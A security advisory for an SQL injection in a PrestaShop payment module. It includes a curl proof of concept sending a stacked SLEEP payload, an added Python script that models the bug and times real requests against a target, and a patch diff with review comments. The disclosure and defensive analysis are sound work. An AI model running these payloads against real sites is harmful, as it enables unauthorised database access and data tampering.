Improper neutralization of an SQL parameter in Administrative Mandate payment module for PrestaShop

High
clotairer published GHSA-hg7m-23j3-rf56 Jan 28, 2023

Package

totadministrativemandate (PrestaShop)

Affected versions

>= 1.2.1, < 1.7.2

Patched versions

1.7.2

Description

In the module "Administrative Mandate" (totadministrativemandate) published by 202 ecommerce, an authenticated user can perform SQL injection in affected versions.

Description

From version 1.2.1 (published 12 October 2012) up to, but not including, version 1.7.2 (published 3 December 2020), a sensitive SQL query in PDFMandate::mandatePDF() (or pdftot::MandatePDF() in versions before 1.5) concatenates the `id_order` request parameter into the statement without escaping. It can be reached with a trivial HTTP request by any authenticated user and exploited as a blind, time-based SQL injection.

Possible malicious usage

  • Obtain admin access
  • Delete data from the associated PrestaShop database

Proof of concept

# 1) Log in to the front office as an authenticated user; the session cookie is saved in cookie.txt.
# 2) Call the module's PDF endpoint with the id_order parameter carrying a stacked query:
#    id_order=1%27%3BSELECT%20SLEEP%2825%29%23 decodes to  1';SELECT SLEEP(25)#
#    A response delayed by roughly 25 seconds confirms the time-based blind injection.
curl -v --cookie-jar cookie.txt 'https://domain.tld/authentification?submitLogin=1&email=XXXX&password=YYY' && \
curl -v --cookie cookie.txt 'https://domain.tld/modules/totadministrativemandate/pdftot.php?id_order=1%27%3BSELECT%20SLEEP%2825%29%23'
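To make the proof of concept concrete, the following added example (written for this page; it is not code from the advisory, from Touch Web or from 202 ecommerce) models in Python the vulnerable query shown in the patch below, decodes the PoC payload, counts how many statements the resulting SQL contains before and after mysqli-style escaping (the mechanism pSQL() relies on), and gives a timing check that compares a benign `id_order` request with the SLEEP payload. The host `domain.tld`, the endpoint path and the login cookie are assumptions; `timed_fetch` is the only function that touches the network and can be replaced by a stub, as the `__main__` block does.

```python
"""Added example: model of the totadministrativemandate injection.

Not code from the advisory or the module. Models the pre/post-patch query
construction, decodes the PoC payload, and gives a time-based check.
The target host, path and session cookie are assumptions.
"""
import time
import urllib.parse
import urllib.request

DB_PREFIX = "ps_"  # PrestaShop default prefix; the advisory recommends changing it

# Decoded form of the PoC parameter value 1%27%3BSELECT%20SLEEP%2825%29%23
PAYLOAD = urllib.parse.unquote("1%27%3BSELECT%20SLEEP%2825%29%23")


def build_query_vulnerable(reference: str) -> str:
    """Pre-patch concatenation from pdfmandate15/16.php, transcribed to Python."""
    return ("SELECT `id_order` FROM `" + DB_PREFIX + "orders` "
            "WHERE `reference` = '" + reference + "' ")


def mysql_escape(value: str) -> str:
    """Minimal model of mysqli_real_escape_string(), which pSQL() builds on."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in value)


def build_query_patched(reference: str) -> str:
    """Post-patch form: the value is escaped before it enters the literal."""
    return build_query_vulnerable(mysql_escape(reference))


def statement_count(sql: str) -> int:
    """Count top-level statements in a MySQL string: ';' inside a
    single-quoted literal (with backslash escapes) does not split, and a
    '#' outside a literal starts a comment that swallows the rest."""
    count, in_str, i = 1, False, 0
    while i < len(sql):
        ch = sql[i]
        if in_str:
            if ch == "\\":
                i += 1                      # skip the escaped character
            elif ch == "'":
                in_str = False
        elif ch == "'":
            in_str = True
        elif ch == "#":
            break                           # comment to end of line
        elif ch == ";" and sql[i + 1:].strip():
            count += 1
        i += 1
    return count


def injected_url(base_url: str, sleep_s: int = 25) -> str:
    """Build the PoC URL; quote(safe='') yields the exact encoding in the PoC."""
    value = "1';SELECT SLEEP(%d)#" % sleep_s
    return base_url + "?id_order=" + urllib.parse.quote(value, safe="")


def timed_fetch(url: str, cookie: str = "") -> float:
    """Real transport (assumed target): seconds until the body is fully read."""
    headers = {"Cookie": cookie} if cookie else {}
    req = urllib.request.Request(url, headers=headers)
    start = time.perf_counter()
    with urllib.request.urlopen(req, timeout=120) as resp:
        resp.read()
    return time.perf_counter() - start


def blind_sleep_check(fetch, base_url: str, sleep_s: int = 25,
                      margin: float = 0.8) -> dict:
    """Mirror the PoC: time a benign id_order request and the SLEEP payload.
    `fetch(url) -> seconds`, so the network layer can be stubbed out."""
    benign = base_url + "?id_order=" + urllib.parse.quote("1", safe="")
    t_benign = fetch(benign)
    t_inject = fetch(injected_url(base_url, sleep_s))
    return {"baseline_s": t_benign, "injected_s": t_inject,
            "vulnerable": (t_inject - t_benign) >= margin * sleep_s}


if __name__ == "__main__":
    print(build_query_vulnerable(PAYLOAD))   # two statements reach MySQL
    print(build_query_patched(PAYLOAD))      # one statement, quote escaped
    print(statement_count(build_query_vulnerable(PAYLOAD)),
          statement_count(build_query_patched(PAYLOAD)))
    # Offline run with a constructed stub; against a real target pass
    # functools.partial(timed_fetch, cookie="<front-office session cookie>").
    stub = lambda url: 25.2 if "SLEEP" in url else 0.2
    print(blind_sleep_check(stub, "https://domain.tld/modules/"
                            "totadministrativemandate/pdftot.php"))
```

The statement counter is deliberately small: it only understands single-quoted literals, backslash escapes and `#` comments, which is enough to show why escaping the quote turns the stacked query back into a single `SELECT`. The timing check uses a margin of 80 % of the requested sleep so that network jitter on the baseline request does not produce a false negative; keep `sleep_s` well below any reverse-proxy timeout when running it for real.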

Sample patch for 1.6.2

--- a/totadministrativemandate/pdfmandate15.php
+++ b/totadministrativemandate/pdfmandate15.php
@@ -1166,15 +1166,15 @@ class PDFMandate extends FPDF
         $mode = 'D';
         $slip = false;
         $delivery = false;
        $reference = Tools::getValue('id_order');

        if (version_compare(_PS_VERSION_, '1.5', '>')) {
-            $SQL = 'SELECT `id_order` FROM `'._DB_PREFIX_."orders` WHERE `reference` = '".$reference."' ";
+            $SQL = 'SELECT `id_order` FROM `'._DB_PREFIX_."orders` WHERE `reference` = '".pSQL($reference)."' ";
            $id_order = Db::getInstance()->getValue($SQL);
        } else {
            $id_order = Tools::getValue('id_order');
        }
        $order = new Order($id_order);
 
        if (
            !Validate::isLoadedObject($order)
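Review bot: the `else` branch at `$id_order = Tools::getValue('id_order');` still hands the raw parameter to `new Order($id_order)` and relies on whatever integer cast the `Order` constructor performs; an explicit `(int)Tools::getValue('id_order')` would make that intent visible and keep the two branches symmetric. Two smaller points in the same hunk: `version_compare(_PS_VERSION_, '1.5', '>')` is false for exactly 1.5.0, so that release takes the raw-id branch while every later 1.5.x takes the reference lookup, and `'>='` looks like the intended comparison; and `pSQL($reference)` is adequate for this string literal because it escapes the quote the proof of concept relies on, but if order references follow a fixed format, rejecting any value that does not match it before the query runs would be a stricter check than escaping alone.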

--- a/totadministrativemandate/pdfmandate16.php
+++ b/totadministrativemandate/pdfmandate16.php
@@ -345,15 +345,15 @@ class PDFMandate extends TCPDF
         $mode = 'D';
         $slip = false;
         $delivery = false;
        $reference = Tools::getValue('id_order');

        if (version_compare(_PS_VERSION_, '1.5', '>')) {
-            $SQL = 'SELECT `id_order` FROM `'._DB_PREFIX_."orders` WHERE `reference` = '".$reference."' ";
+            $SQL = 'SELECT `id_order` FROM `'._DB_PREFIX_."orders` WHERE `reference` = '".pSQL($reference)."' ";
            $id_order = Db::getInstance()->getValue($SQL);
        } else {
            $id_order = Tools::getValue('id_order');
        }
        $order = new Order($id_order);
 
        if (
            !Validate::isLoadedObject($order)
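Review bot: this hunk is the same change, line for line, as the one in pdfmandate15.php, including the `version_compare` guard and the `$SQL` concatenation; the order-by-reference lookup should live in one shared helper that both PDFMandate classes call, so the next fix does not have to be applied twice and cannot be missed in one of the two files. Also, `$reference = Tools::getValue('id_order');` reads a parameter named `id_order` but treats it as an order reference in the first branch and as a numeric id in the second, which is confusing to review; naming the parameter after what it carries, or documenting that it is overloaded, would help.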

Other recommendations

  • It is recommended to upgrade the module to version 1.7.2 or later.
  • Upgrade PrestaShop to 1.7.8.8 or later, which disables multi-statement query execution (statements separated by ";"). This blocks the stacked-query form used in the proof of concept but does not remove the injection itself.
  • Change the default database prefix ps_ to a new, longer, arbitrary prefix. This makes table names harder to guess and is defence in depth only.

Timeline

Date Action
2022-09-26 Issue discovered by Touch Web during a code review
2022-09-26 Contacted 202 ecommerce
2022-09-26 202 ecommerce answered with the scope of affected releases and confirmed that a fixed release had been published two years earlier
2022-12-05 Requested a CVE ID
2023-01-21 Obtained the CVE ID from mitre.org
2023-01-30 Published this advisory

202 ecommerce thanks Touch Web for its courtesy and its help after the vulnerability disclosure.

Severity

High
8.3
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
Low
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

CVE ID

CVE-2022-46965
